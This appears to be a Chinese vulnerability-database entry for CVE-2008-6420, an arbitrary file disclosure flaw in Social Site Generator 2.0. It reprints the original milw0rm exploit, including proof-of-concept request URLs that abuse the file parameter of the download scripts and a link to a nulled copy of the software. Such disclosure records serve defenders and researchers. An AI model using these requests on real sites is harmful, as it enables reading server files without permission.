Social Site Generator目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115328 漏洞类型 信息泄露
发布时间 2008-06-01 更新时间 2009-03-17
CVE编号 CVE-2008-6420 CNNVD-ID CNNVD-200903-130
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/5711
https://www.securityfocus.com/bid/34149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-130
|漏洞详情
SocialSiteGenerator(SSG)是一款社交网络系统(SNS)平台构建工具。SocialSiteGenerator(SSG)2.0版本允许远程攻击者可以借助对(1)filedload.php,(2)webadmin/download.php,和(3)webadmin/download_file.php的文件参数,读取任意文件。
|漏洞EXP
############################################################################################
# 
# Application Name         : Social Site Generator
#
# Download                 : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type          : Remote File disclouse
#
# Dork                     : search it :p
#
# Vulnerable file          : filedload.php
#
# author                   : Stack & Jadi
#
# Team                     : v4 Team http://v4-team.com
#
# THNX                     : ALLAH
#Greetz : Houssamix & Djekmani & Jadi & iuoisn &Room-Hackers All muslims HaCkeRs  :)
#                               www.v4-team.com     &    www.Real-Hack.com   &    www.Tryag.com
#
#
############################################################################################
< ------------------- Stack ------------------- >|
\        /                                                          |
  \    /          Wanted                           |
    \/__________________________________|

< -- Bug -- >
Exploit :
http://target/path/filedload.php?file=filedload.php
http://target/path/webadmin/download.php?file=download.php
http://target/path/webadmin/download_file.php

# milw0rm.com [2008-06-01]
|受影响的产品
Social Site Generator Social Site Generator 0
|参考资料

来源:XF
名称:socialsitegenerator-file-info-disclosure(42781)
链接:http://xforce.iss.net/xforce/xfdb/42781
来源:BID
名称:34149
链接:http://www.securityfocus.com/bid/34149
来源:MILW0RM
名称:5711
链接:http://www.milw0rm.com/exploits/5711
来源:SECUNIA
名称:30462
链接:http://secunia.com/advisories/30462
来源:OSVDB
名称:45864
链接:http://osvdb.org/45864
来源:OSVDB
名称:45863
链接:http://osvdb.org/45863
来源:OSVDB
名称:45862
链接:http://osvdb.org/45862